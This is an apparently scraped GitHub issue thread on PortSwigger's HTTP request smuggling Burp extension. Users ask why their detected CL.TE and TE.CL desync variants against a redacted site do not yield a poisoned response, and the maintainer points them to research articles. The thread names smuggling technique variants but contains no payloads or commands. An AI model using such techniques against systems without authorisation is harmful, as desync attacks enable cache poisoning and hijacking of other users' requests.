search

PortSwigger / http-request-smuggler

https://portswigger.net/blog/http-desync-attacks
Other
952 stars 101 forks source link

Not able to get "404" status code after smuggling the attack through (TE.CL & CE.TL)? #18

Closed anshumanpattnaik closed 4 years ago

anshumanpattnaik commented 4 years ago

Burp throws one issue that "http://redacted.com" vulnerable to "HTTP Request Smuggling" but when I am trying to Smuggle the attack (TE.CL & CE.TL) no "404" status in the response.

Burp trying to exploits this by different smuggling techniques. {HTTP Request Smuggling: CL.TE aposed (delayed response)} {HTTP Request Smuggling: CL.TE quoted (delayed response)} {HTTP Request Smuggling: TE.CL 0dwrap} {HTTP Request Smuggling: CL.TE gareth1} {HTTP Request Smuggling: CL.TE aposed left-alive} {HTTP Request Smuggling: CL.TE nested left-alive} {HTTP Request Smuggling: CL.TE quoted left-alive} {HTTP Request Smuggling: CL.TE suffix1:127 left-alive} {HTTP Request Smuggling: CL.TE spacefix1:127 left-alive}

is it vulnerable to this attack?

Thanks

albinowax commented 4 years ago

I can't provide per-target support but I suggest you read https://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn and https://portswigger.net/research/http-desync-attacks-what-happened-next

DoubleDeckerMilton commented 4 years ago

Burp giving me HRS indication on sites like " CL.TE left alive delayed response "

I have watched your presentation, done labs at portsiwgger, and read all the blogs i can found on portswigger as well as on the other forum,also watched @defparam talk at @nahamcom for same topic, but i am not getting poisoned response back, and what BurpSuite mean by delayed response and left-alive.

Burp trying to exploits this by different smuggling techniques. {HTTP Request Smuggling: CL.TE aposed (delayed response)} {HTTP Request Smuggling: CL.TE quoted (delayed response)} {HTTP Request Smuggling: TE.CL 0dwrap} {HTTP Request Smuggling: CL.TE gareth1} {HTTP Request Smuggling: CL.TE aposed left-alive} {HTTP Request Smuggling: CL.TE nested left-alive} {HTTP Request Smuggling: CL.TE quoted left-alive} {HTTP Request Smuggling: CL.TE suffix1:127 left-alive} {HTTP Request Smuggling: CL.TE spacefix1:127 left-alive}

Thanks @albinowax your presentation are amazing, just watched CORS,Desync,Cracking lens.